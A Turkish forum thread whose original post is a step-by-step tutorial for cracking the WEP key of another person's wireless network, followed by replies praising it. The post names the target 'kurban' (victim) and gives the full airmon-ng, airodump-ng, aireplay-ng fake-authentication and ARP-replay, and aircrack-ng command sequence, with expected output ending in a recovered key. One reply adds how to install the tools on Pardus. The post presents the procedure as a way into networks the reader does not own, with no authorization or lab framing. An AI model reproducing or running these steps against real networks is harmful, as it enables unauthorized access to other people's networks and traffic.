

WLAN Password Cracking -1- [WEP]
-
Merhabalar,
wireless aglarina son dönemde cogalan ilgiden ötürü ve bircok kez crack nasil yapilir sorulari üzerine bu konuya el atmak istedim.Öncelikle sunu acikliyayim.
Spoof ve Crack islemlerinde linux olmazsa olmaz gereksinimlerdendir.
Linux`u zor, anlasilmaz sadece elit kisilerin kullanabilecegi görüntüsü bircok kisinin beynine islemis nedense.
Bu tabuyu asmaliyiz.Baslangic icin Wep sifreleme algoritmasina deginmemin sebebi, bu sifreleme sisteminin en kolay kirilmasindan dolayidir. Wpa algoritmasina ileriki asamalarda deginecegim.
Wireless sifre kirmasinin genel mantigi , hedefin mac adresi snifflenir, gidip gelen paketleri toplanilir, yeterli paket elde edildiginde mac adresi kopyalanir ve sifre elde edilir.
Herseyin kolaylastigi bu dönemlerde, bu islemi yapmak icin sadece 5 dk bile yeterli olmaktadir.
Bu konu üzerine tasarlanmis olan BackTrack 3 linux modu, wireless cracking icin hertürlü yazilimi sunmaktadir.Crackinge baslamadan önce gereken temel 2 gereksinim var.
1- BackTrack 3http://remote-exploit.org/cgi-bin/fileget?version=bt3-cd
2- BackTrack 3 ile uyumlu calisan bir wireless karti.http://backtrack.offensive-security.com/index.php?title=HCL:WirelessDownload adresi:
Uyumlu kart listesi:
A)
Ilk olarak BackTrack 3 ü indirin, boot cd olarak cd ye kaydedin.
Bilgisayari cd`den baslatin.
Sistem tam olarak acilana kadar sürekli enter tusuna basili tutun.
B)
Menüden wlan monitöre girin ve cevrenizdeki wep olan wireless noktalarindan sinyali en yüksek olaninin mac adresini kopyalayin.
C)
Simdi crack islemine basliyabiliriz.
Öncelikle hangi bilgileri kullanacagimizi belirliyelim.
Kendi MAC Adresimiz: 00:0R:E0:00:D0:00BSSID (Kurbanin MAC Adresi): 00:MI:LI:TA:N1:11
ESSID (Kurbanin Baglantisinin ismi): kurbanttnet
Access point kanali: 9
Wireless arayüzü: ath0
Bu veriler crack isleminde kullanilmis olan örnek veriler. Bunlari birebir kendi bilgilerinizle degistirmeniz gerekiyor.
#####################################################################
A)
Simdi sirayla su islemleri yapin.
1-
Konsol u baslatin ve sunu yazin.airmon-ng stop ath0
Suna benzer bir cevap gelmeli
Interface Chipset Driver
wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (VAP destroyed)
2-
Simdi sunu yaziniwconfig
Suna benzer bir cevap gelmeli
lo no wireless extensions.
eth0 no wireless extensions.
wifi0 no wireless extensions.
3-
Simdi sunu yazinairmon-ng start wifi0 9
Suna benzer bir cevap gelmeli
Interface Chipset Driver
wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (monitor mode enabled)
4-
Tekrardan sunu yaziniwconfig
Suna benzer bir cevap gelmeli
lo no wireless extensions.
wifi0 no wireless extensions.
eth0 no wireless extensions.
5-
Simdi sunu yazinath0 IEEE 802.11g ESSID:"" Nickname:"" Mode:Monitor Frequency:2.452 GHz Access Point: 00:0R:E0:00:D0:00 Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3 Retry:off RTS thr:off Fragment thr:off Encryption key:off Power Management:off Link Quality=0/94 Signal level=-95 dBm Noise level=-95 dBm Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0 Tx excessive retries:0 Invalid misc:0 Missed beacon:0
airodump-ng -c 9 --bssid 00:MI:LI:TA:N1:11 -w output ath0
Suna benzer bir cevap gelmeli
CH 9 ][ Elapsed: 8 mins ][ 2007-03-21 19:25
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:14:6C:7E:40:80 42 100 5240 178307 338 9 54 WEP WEP kurbanttnet
BSSID STATION PWR Lost Packets Probes
00:14:6C:7E:40:80 00:0F:B5:88:AC:82 42 0 183782
Konsol penceresini kenara cekin , isleme devam etsin.
Buraya kadar hersey yolunda ise crack islemini yapmamiza az kaldi.
B)
Yeni bir konsol penceresi acin.
Sunu yazin
aireplay-ng -1 0 -e kurbanttnet -a 00:MI:LI:TA:N1:11 -h 00:0R:E0:00:D0:00 ath0
Söyle bir cevap gelmeli
18:18:20 Sending Authentication Request
18:18:20 Authentication successful
18:18:20 Sending Association Request
18:18:20 Association successful :-)
C)
Yeni bir konsol penceresi daha acin.
Sunu yazin
aireplay-ng -3 -b 00:MI:LI:TA:N1:11 -h 00:0R:E0:00:D0:00 ath0
Söyle bir cevap gelmeli
Saving ARP requests in replay_arp-0321-191525.cap
You should also start airodump-ng to capture replies.
Read 629399 packets (got 316283 ARP requests), sent 210955 packets...
D)
Yeni bir konsol penceresi daha acin.
Sunu yazin
aircrack-ng -z -b 00:MI:LI:TA:N1:11 output*.cap
Bu noktadan sonra eger yeterli paket elde edildiyse söyle bir cevap gelecektir.
Aircrack-ng 0.9 [00:03:06] Tested 674449 keys (got 96610 IVs) KB depth byte(vote) 0 0/ 9 12( 15) F9( 15) 47( 12) F7( 12) FE( 12) 1B( 5) 77( 5) A5( 3) F6( 3) 03( 0) 1 0/ 8 34( 61) E8( 27) E0( 24) 06( 18) 3B( 16) 4E( 15) E1( 15) 2D( 13) 89( 12) E4( 12) 2 0/ 2 56( 87) A6( 63) 15( 17) 02( 15) 6B( 15) E0( 15) AB( 13) 0E( 10) 17( 10) 27( 10) 3 1/ 5 78( 43) 1A( 20) 9B( 20) 4B( 17) 4A( 16) 2B( 15) 4D( 15) 58( 15) 6A( 15) 7C( 15) KEY FOUND! [ 12:34:56:78:90 ] Probability: 100%
Eger böyle bir cevap elde edemediyseniz, ayni islemi daha fazla paket elde ettikten sonra tekrarlayiniz.
Ne kadar fazla paket elde ettiyseniz , sifrenin kirilmasi kesinlesecektir.Kolay Gelsin.
-
vdsl'de geldi yaa.şimdi wireless hacking olayları çok daha merak cezbedecek.
-
güzel bir döküman hazırlamışsın ellerine sağlık.. keşke resimli hazırlasaydın.. Adminlerden rica edip döküman arşivine koydururduk..
-
cd den fln boot edilebilen linuxlerden yapabilrmiyik bunu.linux cahiliymde ayıptır sölemesi
-
ertan bunu yazdı:
-----------------------------güzel bir döküman hazırlamışsın ellerine sağlık.. keşke resimli hazırlasaydın.. Adminlerden rica edip döküman arşivine koydururduk..
-----------------------------
tsk dostum. kodlari mecbur yazmak gerektiginden dolayi,görsel pek bir islevi olmadigindan gerek duymadim acikcasi.fenerist07 bunu yazdı:
-----------------------------cd den fln boot edilebilen linuxlerden yapabilrmiyik bunu.linux cahiliymde ayıptır sölemesi
-----------------------------
evet yapabilirsin. backtrack zaten boot yapilan linux. -
Hocam şunu yazın bunu yazın yerine neden yazıldığını analtsan daha faydalı olabilirdi. Uğraşmışsın eline sağlık.
-
KrypT bunu yazdı:
-----------------------------Hocam şunu yazın bunu yazın yerine neden yazıldığını analtsan daha faydalı olabilirdi. Uğraşmışsın eline sağlık.
-----------------------------
tsk.mantigini bilen zaten bu döküma ihtiyaci olmaz diye düsünüyorum.
tek tek islemin ne yaptigini yazmamda pek bir ise yaramaz, sonucta hazir yazirmis bir codlamaya sadece start emri veriyorsun.
giriste özet olarak genel mantiga degindim. yeterlidir umarim. -
WLAN hack'e basit bir giris.
Bircok yöntemden tekini vermissin. Bu yöntemle eger kablosuz agda trafik yaratan bir kullanici varsa IVs toplayabilirsin.Örnegin kullanici yoksa, bambaska yol izlemen gerekebiliyor yada fakeauth yöntemi calismassa.
Birde hedef aga uzaktaysan paket toplamani etkiliyor.Arkadaslar ekstra BackTrack indirmenize gerek yok.
Pardus kullaniyorsaniz konsoldan
sudo pisi ar http://urlile Pardusun contrib deposunu kurun, ondan sonrada
sudo pisi it aircrack-ngBöylece Pardus altinda bu islemleri yapabilirsiniz.
Birde not düseyim, kablosuz aglar kirabilmeniz icin uygun bir donanima ihtiyaciniz var.
Cipseti Atheros veya Prism olan Wireless USB adaptörleri veya PCMCIA kartlari ile yapabilirsiniz.Bu arada güzel paylasimindan dolayi tesekkürler.
-
Tsk.Bu konuda G-Turk`ten destek alabilirsiniz bu arada arkadaslar. Uzmanlik alanina girer.
Basliga bende Red Tahribat mi yazsaydim acaba :) -
saolasın hojam güsel bi döküman olmuş.herkesin merak ettiği bi konu.chipsetim uysa bnde indirip bol bol deneme yapcam ama chipsetten kaybbediom.şimdi gidip chipseti uyumlu bi kart alamam :|
-
emeğine sağlık güzel paylaşım